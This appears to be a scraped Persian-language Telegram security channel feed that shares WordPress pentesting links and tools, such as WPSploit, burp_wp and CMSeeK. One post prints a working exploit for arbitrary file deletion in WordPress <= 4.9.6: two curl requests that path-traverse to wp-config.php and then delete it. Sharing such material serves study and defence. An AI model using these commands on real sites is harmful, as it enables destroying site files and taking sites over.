Wordpress <= 4.8.2 SQL Injection POC
https://blog.vulspy.com/2017/11/09/Wordpress-4-8-2-SQL-Injection-POC/
#wordpress
#sqli
#poc
@sec_nerd
https://blog.vulspy.com/2017/11/09/Wordpress-4-8-2-SQL-Injection-POC/
#wordpress
#sqli
#poc
@sec_nerd
کشف باگ در افزونه های وردپرس با WPSploit
https://github.com/m4ll0k/WPSploit
#wordpress
#web
#pentest
@sec_nerd
https://github.com/m4ll0k/WPSploit
#wordpress
#web
#pentest
@sec_nerd
5500 وبسایت وردپرسی حاوی اسکریپتی هستند که ورودهای کاربران را ضبط میکند!
https://bit.ly/2joah9Q
#wordpress
#web
@sec_nerd
https://bit.ly/2joah9Q
#wordpress
#web
@sec_nerd
آسیب پذیری های رایج در فایل xmlrpc.php وردپرس و نحوه اکسپلویت کردن آنها
https://medium.com/@the.bilal.rizwan/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32
#wordpress
#web
#pentest
#exploit
@sec_nerd
https://medium.com/@the.bilal.rizwan/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32
#wordpress
#web
#pentest
#exploit
@sec_nerd
Medium
Wordpress xmlrpc.php -common vulnerabilites & how to exploit them
Hello there! , whats up ? ,Bilal Rizwan here hope your doing great & having fun learning from the community like I am.
افزونه WP برای burpsuite که با استفاده از تکنیک admin-ajax.php?action=%action_name% پلاگین ها را پیدا میکند و تاکنون ۳۸ هزار پلاگین در آن ثبت شده است.
https://github.com/kacperszurek/burp_wp
#burpsuite
#wordpress
#web
#pentest
@sec_nerd
https://github.com/kacperszurek/burp_wp
#burpsuite
#wordpress
#web
#pentest
@sec_nerd
GitHub
GitHub - kacperszurek/burp_wp: Find known vulnerabilities in WordPress plugins and themes using Burp Suite proxy. WPScan like plugin…
Find known vulnerabilities in WordPress plugins and themes using Burp Suite proxy. WPScan like plugin for Burp. - kacperszurek/burp_wp
اکسپلویت جدید وردپرس که قابلیت حذف هر فایل دلخواه را به هکرها میدهد!
# Exploit Title: Wordpress <= 4.9.6 Arbitrary File Deletion Vulnerability
# Date: 2018-06-27
# Exploit Author: VulnSpy
# Vendor Homepage: https://www.wordpress.org
# Software Link: https://www.wordpress.org/download
# Version: <= 4.9.6
# Tested on: php7 mysql5
# CVE :
Step 1:
#wordpress
#wp
#exploit
#web
#pentest
@sec_nerd
# Exploit Title: Wordpress <= 4.9.6 Arbitrary File Deletion Vulnerability
# Date: 2018-06-27
# Exploit Author: VulnSpy
# Vendor Homepage: https://www.wordpress.org
# Software Link: https://www.wordpress.org/download
# Version: <= 4.9.6
# Tested on: php7 mysql5
# CVE :
Step 1:
curl -v 'https://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php'Step 2:
curl -v 'https://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***'
#wordpress
#wp
#exploit
#web
#pentest
@sec_nerd
WordPress.org
Download
Download WordPress today, and get started on creating your website with one of the most powerful, popular, and customizable platforms in the world.
امنیت اطلاعات
اکسپلویت جدید وردپرس که قابلیت حذف هر فایل دلخواه را به هکرها میدهد! # Exploit Title: Wordpress <= 4.9.6 Arbitrary File Deletion Vulnerability # Date: 2018-06-27 # Exploit Author: VulnSpy # Vendor Homepage: https://www.wordpress.org # Software Link: http:…
This media is not supported in your browser
VIEW IN TELEGRAM
ابزار شناسایی و اسکن بیش از 80 سیستم مدیریت محتوا
https://github.com/Tuhinshubhra/CMSeeK
#web
#pentest
#tools
#wordpress
#joomla
@sec_nerd
https://github.com/Tuhinshubhra/CMSeeK
#web
#pentest
#tools
#wordpress
#joomla
@sec_nerd